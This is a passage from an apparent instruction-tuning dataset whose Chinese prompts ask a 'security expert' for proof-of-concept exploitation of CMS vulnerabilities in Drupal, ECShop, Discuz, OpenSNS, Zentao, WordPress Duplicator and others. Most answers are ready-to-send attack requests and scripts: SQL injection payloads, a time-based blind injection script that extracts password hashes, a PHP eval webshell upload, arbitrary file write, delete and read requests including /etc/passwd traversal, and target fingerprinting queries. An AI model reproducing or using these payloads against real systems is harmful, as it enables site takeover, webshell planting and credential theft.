form-data; name=\\\"form_id\\\"\\r\\n\".\n\"\\r\\n\".\n\"user_register_form\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"contact\\\"\\r\\n\".\n\"\\r\\n\".\n\"1\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"timezone\\\"\\r\\n\".\n\"\\r\\n\".\n\"America/New_York\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"_triggering_element_name\\\"\\r\\n\".\n\"\\r\\n\".\n\"user_picture_0_upload_button\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"_triggering_element_value\\\"\\r\\n\".\n\"\\r\\n\".\n\"Upload\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"_drupal_ajax\\\"\\r\\n\".\n\"\\r\\n\".\n\"1\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"ajax_page_state[theme]\\\"\\r\\n\".\n\"\\r\\n\".\n\"bartik\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"ajax_page_state[theme_token]\\\"\\r\\n\".\n\"\\r\\n\".\n\"\\r\\n\".\n\"-----------------------------60928216114129559951791388325\\r\\n\".\n\"Content-Disposition: form-data; name=\\\"ajax_page_state[libraries]\\\"\\r\\n\".\n\"\\r\\n\".\n\"bartik/global-styling,classy/base,classy/messages,core/drupal.ajax,core/drupal.collapse,core/drupal.timezone,core/html5shiv,core/jquery.form,core/normalize,file/drupal.file,system/base\\r\\n\".\n\"-----------------------------60928216114129559951791388325--\\r\\n\";\n\n$pk = \t\"POST /user/register?element_parents=user_picture/widget/0&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\\r\\n\".\n\t\"Host: \".$host.\"\\r\\n\".\n\t\"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\\r\\n\".\n\t\"Accept: application/json, text/javascript, */*; q=0.01\\r\\n\".\n\t\"Accept-Language: en-US,en;q=0.5\\r\\n\".\n\t\"X-Requested-With: XMLHttpRequest\\r\\n\".\n\t\"Referer: http://\" .$host. \"/user/register\\r\\n\".\n\t\"Content-Length: \". strlen($data). \"\\r\\n\".\n\t$data;\n\necho \"uploading file, please wait...\\n\";\n\nfor ($i =1; $i <= 2; $i++){\n$fp = fsockopen($host,$port,$e,$err,1);\nif (!$fp) {die(\"not connected\");}\nfputs($fp,$pk);\n$out=\"\";\nwhile (!feof($fp)){\n  $out.=fread($fp,1);\n}\nfclose($fp);\n\necho \"Got \".$i.\"/2 500 errors\\n\";\n//echo $out.\"\\n\";\nsleep(1);\n}\n\necho \"please check /var/www/html/drupal/sites/default/files/pictures/YYYY-MM\\n\";\n\n?>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Drupal XSS漏洞 CVE-2019-6341.md"}
    96. 

  96. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ECShop 4.x collection_list SQL注入\n漏洞描述:ECShop是上海商派网络科技有限公司(ShopEx)旗下——B2C独立网店系统,适合企业及个人快速构建个性化网上商店,系统是基于PHP语言及MYSQL数据库构架开发的跨平台开源程序。 参考阅读: - https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw - http://foreversong.cn/archives/1556\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. GET /user.php?act=collection_list HTTP/1.1\nHost: your-ip:8080\nX-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:\"user_id\";s:38:\"0'-(updatexml(1,repeat(user(),2),1))-'\";s:7:\"payment\";s:1:\"4\";}|45ea207d7a2b68c49582d2d22adf953a\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36\nCookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1;\nConnection: close\n3. GET /user.php?act=collection_list HTTP/1.1\nHost: 192.168.1.162:8080\nX-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:\"1' and updatexml(1,repeat(user(),2),1) and '\";|\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36\nCookie: ECS_ID=f7b1398a0fdc189b691a6f1c969911ac1eea8fca;ECS[password]=445ac05c4ae0555ed091bb977b08581f;ECS[user_id]=3;ECS[username]=demo;ECS[visit_times]=2;ECSCP_ID=1a8bddd69b3b81efbe441a185ac52e7d24852d87;PHPSESSID=bb2033d66975ff7c2be29896d2d4260c;real_ipd=172.18.0.1;\nConnection: close\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/ECShop 4.x collection_list SQL注入.md"}
    97. 

  97. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:华宜互联 硬编码超级管理员漏洞\n漏洞描述:华宜互联CMS默认存在超级管理员漏洞,如不修改则使用默认账号密码即可登录超级管理员\n影响版本:``` 华宜互联CMS ```\n网络测绘:``` body=\"华宜网络\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. body=\"华宜网络\"\n2. [华宜互联0day分享](https://mp.weixin.qq.com/s?__biz=MzAxMzg4NDg1NA==&mid=2247484357&idx=1&sn=56abfaa736805e22910c9e9e1f8d8c3a&chksm=9b9a8f1caced060a3fbb4ce29fbe0c3b0a7399c542406237ebd0e3de71c7c538b459ff2a0c09&mpshare=1&scene=1&srcid=1117arJqHdtyfF7tqRrWAE7C&sharer_sharetime=1605622054852&sharer_shareid=02fbf89adff5cec7c814f47e9e13caca&key=f7cb72e8598687c9e0bf26cdce26791146e76a0a1d0277ca876ac35edce171d423ab6ebbd4174b54d81928ff3eeecf7f396f99a245a3cc5b76ec063c5d5569fadfb257044bafedda4b2583ac941bea57ed294bbab33429b9ae9e71fab7ee6d49f049d2cde08e459f43cd378a2a6548311fea16848)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/华宜互联 硬编码超级管理员漏洞.md"}
    98. 

  98. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:狮子鱼CMS wxapp.php 任意文件上传漏洞\n漏洞描述:狮子鱼CMS wxapp.php文件 存在任意文件上传漏洞,攻击者在没有身份验证的情况下可以上传恶意文件\n影响版本:``` 狮子鱼CMS ```\n网络测绘:``` \"/seller.php?s=/Public/login\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. \"/seller.php?s=/Public/login\"\n2. POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1\nHost: \nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: null\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/avif,http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/webp,http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\n------WebKitFormBoundary8UaANmWAgM4BqBSs\nContent-Disposition: form-data; name=\"upfile\"; filename=\"test.php\"\nContent-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif\n\n<?php @eval($_POST['test']);?>\n------WebKitFormBoundary8UaANmWAgM4BqBSs--\n3. POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/狮子鱼CMS wxapp.php 任意文件上传漏洞.md"}
    99. 

  99. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Discuz 3.4 最新版后台getshell\n漏洞描述:最新版下载地址:https://gitee.com/Discuz/Discuz ```php <?php $uc_key=\"123456\";// $time = time() + 720000; $str = \"time=\".$time.\"&action=updateapps\"; $code = authcode($str,\"ENCODE\",$uc_key); $code = str_replace('+','%2b', $code) ; $code = str_replace('/','%2f', $code) ; echo \"$code\"; function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key != '' ? $key : '123456'); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } ?> ``` ![image-20221206155432361](images/image-20221206155432361.png)\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. <?php\n    $uc_key=\"123456\";//\n    $time = time() + 720000;\n    $str = \"time=\".$time.\"&action=updateapps\";\n    $code = authcode($str,\"ENCODE\",$uc_key);\n    $code = str_replace('+','%2b', $code) ;\n    $code = str_replace('/','%2f', $code) ;\n    echo \"$code\";\n    function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {\n    $ckey_length = 4;\n\n    $key = md5($key != '' ? $key : '123456');\n    $keya = md5(substr($key, 0, 16));\n    $keyb = md5(substr($key, 16, 16));\n    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';\n \n    $cryptkey = $keya.md5($keya.$keyc);\n    $key_length = strlen($cryptkey);\n \n    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;\n    $string_length = strlen($string);\n \n    $result = '';\n    $box = range(0, 255);\n \n    $rndkey = array();\n    for($i = 0; $i <= 255; $i++) {\n        $rndkey[$i] = ord($cryptkey[$i % $key_length]);\n    }\n \n    for($j = $i = 0; $i < 256; $i++) {\n        $j = ($j + $box[$i] + $rndkey[$i]) % 256;\n        $tmp = $box[$i];\n        $box[$i] = $box[$j];\n        $box[$j] = $tmp;\n    }\n \n    for($a = $j = $i = 0; $i < $string_length; $i++) {\n        $a = ($a + 1) % 256;\n        $j = ($j + $box[$a]) % 256;\n        $tmp = $box[$a];\n        $box[$a] = $box[$j];\n        $box[$j] = $tmp;\n        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));\n    }\n \n    if($operation == 'DECODE') {\n        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {\n            return substr($result, 26);\n        } else {\n                return '';\n            }\n    } else {\n        return $keyc.str_replace('=', '', base64_encode($result));\n    }\n \n}\n?>\n2. 最新版下载地址:https://gitee.com/Discuz/Discuz\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Discuz 3.4 最新版后台getshell.md"}
    100. 

  100. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Drupal < 7.32 “Drupalgeddon” SQL注入漏洞 CVE-2014-3704\n漏洞描述:Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2014-3704\n【POC利用方法】\n1. docker-compose up -d\n2. POST /?q=node&destination=node HTTP/1.1\nHost: 192.168.174.128:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 120\n\npass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a\n3. POST /?q=node&destination=node HTTP/1.1\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Drupal  7.32 “Drupalgeddon” SQL注入漏洞 CVE-2014-3704.md"}
    101. 

  101. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:快排CMS 后台XSS漏洞\n漏洞描述:快排CMS 后台存在XSS漏洞,通过后台构造特殊语句可以造成访问网站的用户被XSS影响\n影响版本:``` 快排 CMS <= 1.2 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 快排 CMS <= 1.2\n2. https://gitee.com/qingzhanwang/kpcms\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/快排CMS 后台XSS漏洞.md"}
    102. 

  102. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Discuz!X ≤3.4 任意文件删除漏洞\n漏洞描述:漏洞详情:https://lorexxar.cn/2017/09/30/dz-delete/\n影响版本:``` Discuz!X ≤3.4 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. Discuz!X ≤3.4\n2. docker-compose up -d\n3. POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1\nHost: 192.168.174.128\nContent-Length: 370\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.174.128\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryW8uA1wbCsmuiargU\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nReferer: http://192.168.174.128/home.php?mod=spacecp&ac=profile&op=base\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nCookie: AuthSession=dGhyZWVraTo2MjE0NEM0Mzrhe4V-bNxBqV-1RKA7mJS_YQrC9A; ot6_visitedfid=2; ot6_sid=9yWYy0; et56_2132_saltkey=qN7vqIdT; et56_2132_lastvisit=1645503280; et56_2132_sid=Ze005m; et56_2132_seccode=1.526c82122231460dd9; et56_2132_ulastactivity=6467KkrgcKDQNmUlDxKLd592a6DUvLlRSPU4g07eDld2bKtFo3JU; et56_2132_auth=45cdTg%2F0tTayn1c5i6fOd%2F96K8vGKx7SVg9MgaAoLalS102hICOtVzWjuDHbYtyyH8Rqe54O1WS9d%2Fa0s%2FIV; et56_2132_nofavfid=1; et56_2132_onlineusernum=1; et56_2132_noticeTitle=1; et56_2132_lastact=1645507206%09home.php%09misc\nConnection: close\n\n------WebKitFormBoundaryW8uA1wbCsmuiargU\nContent-Disposition: form-data; name=\"formhash\"\n\nd32e951d\n------WebKitFormBoundaryW8uA1wbCsmuiargU\nContent-Disposition: form-data; name=\"birthprovince\"\n\n../../../robots.txt\n------WebKitFormBoundaryW8uA1wbCsmuiargU\nContent-Disposition: form-data; name=\"profilesubmit\"\n\ntrue\n------WebKitFormBoundaryW8uA1wbCsmuiargU--\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Discuz!X ≤3.4 任意文件删除漏洞.md"}
    103. 

  103. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:齐博CMS V7 job.php 任意文件读取漏洞\n漏洞描述:QiboCMS V7版本/do/job.php页面URL参数过滤不严,导致可以下载系统任意文件,获取系统敏感信息。\n影响版本:``` 齐博CMS V7 ```\n网络测绘:``` app=\"齐博软件-v7\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. app=\"齐博软件-v7\"\n2. $url=trim(base64_decode($url));\n    $fileurl=str_replace($webdb[www_url],\"\",$url);\n    if( eregi(\".php\",$fileurl) && is_file(ROOT_PATH.\"$fileurl\") ){\n        die(\"ERR\");\n    }\n\n    if(!$webdb[DownLoad_readfile]){\n        $fileurl=strstr($url,\"://\")?$url:tempdir($fileurl);\n        header(\"location:$fileurl\");\n        exit;\n    }\n\n\n    $webdb[upfileType] = str_replace(' ','|',$webdb[upfileType]);\n    if( $webdb[local_download] && is_file(ROOT_PATH.$fileurl) && eregi(\"($webdb[upfileType])$\",$fileurl) ){\n        $filename=basename($fileurl);\n        $filetype=substr(strrchr($filename,'.'),1);\n        $_filename=preg_replace(\"/([\\d]+)_(200[\\d]+)_([^_]+)\\.([^\\.]+)/is\",\"\\\\3\",$filename);\n\n        if(eregi(\"^([a-z0-9=]+)$\",$_filename)&&!eregi(\"(jpg|gif|png)$\",$filename)){\n            $filename=urldecode(base64_decode($_filename)).\".$filetype\";\n        }\n        ob_end_clean();\n        header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT');\n        header('Pragma: no-cache');\n        header('Content-Encoding: none');\n        header('Content-Disposition: attachment; filename='.$filename);\n        header('Content-type: '.$filetype);\n        header('Content-Length: '.filesize(ROOT_PATH.\"$fileurl\"));\n        readfile(ROOT_PATH.\"$fileurl\");\n        exit;\n    }\n3. if( eregi(\".php\",$fileurl) && is_file(ROOT_PATH.\"$fileurl\") ){\n        die(\"ERR\");\n    }\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/齐博CMS V7 job.php 任意文件读取漏洞.md"}
    104. 

  104. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:UCMS 文件上传漏洞 CVE-2020-25483\n漏洞描述:UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2020-25483\n【POC利用方法】\n1. POST /ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php HTTP/1.1\n\nHost: ucms.com\n\nContent-Length: 58\n\nCache-Control: max-age=0\n\nUpgrade-Insecure-Requests: 1\n\nOrigin: http://ucms.com\n\nContent-Type: application/x-www-form-urlencoded\n\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 Edg/87.0.664.41\n\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\nReferer: http://ucms.com/ucms/index.php?do=sadmin_fileedit&dir=/&file=CNVD.php\n\nAccept-Encoding: gzip, deflate\n\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6\n\nCookie: admin_213f42=admin; psw_213f42=0ef8fa2c997f64b78cde98b6c7c9cc0a; token_213f42=78012aac\n\nConnection: close\n\n\nuuu_token=78012aac&co=%3C%3Fphp+phpinfo%28%29%3F%3E&pos=17\n2. 访问/ucms/login.php,显示正常及环境安装成功。\n3. POST /ucms/index.php?do=sadmin_fileedit&dir=/&file=1.php HTTP/1.1\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/UCMS 文件上传漏洞 CVE-2020-25483.md"}
    105. 

  105. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:BloofoxCMS 0.5.2.1 存储型XSS\n漏洞描述:参考链接: - https://packetstormsecurity.com/files/161195\n影响版本:``` BloofoxCMS 0.5.1.0 -.5.2.1 ```\n网络测绘:``` app=\"BloofoxCMS\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. BloofoxCMS 0.5.1.0 -.5.2.1\n2. app=\"BloofoxCMS\"\n3. /admin/include/inc_content_articles.php\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/BloofoxCMS 0.5.2.1 存储型XSS.md"}
    106. 

  106. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞\n漏洞描述:禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入\n影响版本:``` 禅道 11.6 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. docker run --name zentao_v11.6 -p 8084:80 -v /u01/zentao/www:/app/zentaopms -v /u01/zentao/data:/var/lib/mysql -e MYSQL_ROOT_PASSWORD=123456 -d docker.io/yunwisdom/zentao:v11.6\n2. public function save($filePath)\n    {\n        $fileContent = $this->post->fileContent;\n        $evils       = array('eval', 'exec', 'passthru', 'proc_open', 'shell_exec', 'system', '$$', 'include', 'require', 'assert');\n        $gibbedEvils = array('e v a l', 'e x e c', ' p a s s t h r u', ' p r o c _ o p e n', 's h e l l _ e x e c', 's y s t e m', '$ $', 'i n c l u d e', 'r e q u i r e', 'a s s e r t');\n        $fileContent = str_ireplace($gibbedEvils, $evils, $fileContent);\n        if(get_magic_quotes_gpc()) $fileContent = stripslashes($fileContent);\n\n        $dirPath = dirname($filePath);\n        $extFilePath = substr($filePath, 0, strpos($filePath, DS . 'ext' . DS) + 4);\n        if(!is_dir($dirPath) and is_writable($extFilePath)) mkdir($dirPath, 0777, true);\n        if(is_writable($dirPath))\n        {\n            file_put_contents($filePath, $fileContent);\n        }\n        else\n        {\n            die(js::alert($this->lang->editor->notWritable . $extFilePath));\n        }\n    }\n3. http://xxx.xxx.xxx.xxx/api-getModel-editor-save-filePath=/tmp/shell.php\n\nPOST:fileContent=<?php phpinfo();?>\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 11.6 api-getModel-editor-save-filePath 任意文件写入漏洞.md"}
    107. 

  107. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSNS ThemeController.class.php 后台任意文件下载漏洞\n漏洞描述:OpenSNS ThemeController.class.php文件中存在文件下载,其中过滤不足导致可以下载服务器任意文件\n影响版本:``` OpenSNS ```\n网络测绘:``` icon_hash=\"1167011145\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1167011145\"\n2. POST /admin.php?s=/theme/packageDownload\n\ntheme=../Conf/common.php\n3. POST /admin.php?s=/theme/packageDownload\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OpenSNS ThemeController.class.php 后台任意文件下载漏洞.md"}
    108. 

  108. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSNS ChinaCityController.class.php SQL注入漏洞\n漏洞描述:OpenSNS ChinaCityController.class.php文件中,可通过拼接SQL语句执行任意SQL命令,获取用户账号密码\n影响版本:``` OpenSNS ```\n网络测绘:``` icon_hash=\"1167011145\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1167011145\"\n2. POST /index.php?s=/home/addons/_addons/china_city/_controller/china_city/_action/getcity.html\n\ncid=0&pid[0]==(select*from(select+sleep(3)union/**/select+1)a)and+1+in+&pid[1]=1\n3. 通过二分法延时注入可以获取用户账号密码,登录后台\n\nimport time\nimport requests\n\nurl = \"http://peiqi.com:8888/index.php?s=/home/addons/_addons/china_city/_controller/china_city/_action/getcity.html\"\n\nflag = \"\"\nfor i in range(1,100):\n    low = 32\n    high = 128\n    while low < high:\n        headers = {\n            \"Content-Type\": \"application/x-www-form-urlencoded\",\n            \"X-Requested-With\": \"XMLHttpRequest\"\n        }\n        mid = (low + high)//2\n        data = \"cid=0&pid[0]==(select*from(select+if(ascii(substr((select/**/password/**/from/**/ocenter_ucenter_member),{},1))<{},sleep(2),1)union/**/select+1)a)and+3+in+&pid[1]=3\".format(i,mid)\n        timeStart = time.time()\n        r = requests.post(url=url, data=data, headers=headers)\n        timeEnd = time.time()\n        # print(r.text, low, high, data,timeStart-timeEnd)\n        if timeEnd - timeStart >= 1: \n            high = mid\n        else:\n            low = mid + 1\n    if low == high == 32:\n        print(\"No  result\")\n        break\n    flag += chr((high + low - 1)//2)\n    print(flag)\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OpenSNS ChinaCityController.class.php SQL注入漏洞.md"}
    109. 

  109. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:发货100 M_id SQL注入漏洞 CNVD-2021-30193\n漏洞描述:发货100 M_id参数存在SQL注入漏洞, 攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` 发货100 ```\n网络测绘:``` icon_hash=\"1420424513\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. icon_hash=\"1420424513\"\n2. /?M_id=1%27&type=product\n3. sqlmap -u 'http://xxx.xxx.xxx.xxx/?M_id=11%27&type=product' -p M_id\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/发货100 M_id SQL注入漏洞 CNVD-2021-30193.md"}
    110. 

  110. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738\n漏洞描述:WordPress Duplicator插件由于对文件下载没有进行验证,则导致了任意文件读取漏洞\n影响版本:``` Duplicator <= v1.3.26 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2020-11738\n【POC利用方法】\n1. Duplicator <= v1.3.26\n2. public static function duplicator_download() {\n        $file = sanitize_text_field($_GET['file']);\n        $filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;\n        // Process download\n        if(file_exists($filepath)) {\n            // Clean output buffer\n            if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {\n                @ob_clean();\n            }\n\n            header('Content-Description: File Transfer');\n            header('Content-Type: application/octet-stream');\n            header('Content-Disposition: attachment; filename=\"'.basename($filepath).'\"');\n            header('Expires: 0');\n            header('Cache-Control: must-revalidate');\n            header('Pragma: public');\n            header('Content-Length: ' . filesize($filepath));\n            flush(); // Flush system output buffer\n\n            try {\n                $fp = @fopen($filepath, 'r');\n                if (false === $fp) {\n                    throw new Exception('Fail to open the file '.$filepath);\n                }\n                while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {\n                    echo $data;\n                }\n                @fclose($fp);\n            } catch (Exception $e) {\n                readfile($filepath);\n            }\n            exit;\n        } else {\n            wp_die('Invalid installer file name!!');\n        }\n    }\n3. /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738.md"}
    111. 

